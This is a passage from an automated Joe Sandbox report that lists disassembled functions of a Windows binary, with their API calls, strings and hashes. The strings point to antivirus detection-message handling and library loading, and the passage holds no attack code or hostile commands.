Instruction Fuzzy Hash: B351DF37B096C585FB21DF72E8502AA7BA1AB42B94F144135EE5C27B9ADE3CD001C708

Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704

Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 000000014000E388

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40

Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000F398

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00

Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00

Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40

Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400092EB

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700

Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40

Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40

Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40

Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704

Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710

Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700

Function 00007FFDA55DFD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction ID: 2fbe4ee90b777e7bfefcc9d2a703f6ad8f70e17fa963f78ee7627a0a0bfc46c4
Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction Fuzzy Hash: 6EF068767292958ADB96CF29A552B2977D1E748780F94803DD58D83B04D63C94608F08

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

null, xrefs: 0000000140003AEF
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949
amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3
amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB
amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7
amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

vseGet, xrefs: 000000014000114B
vseSet, xrefs: 0000000140001166
vseGlobalInit, xrefs: 00000001400010C8
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
vseRelease, xrefs: 0000000140001115
vseExec, xrefs: 0000000140001130
vseInit, xrefs: 00000001400010FA
msi.dll, xrefs: 0000000140001042
MsiLocateComponentW, xrefs: 0000000140001062
vseGlobalRelease, xrefs: 00000001400010DF

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
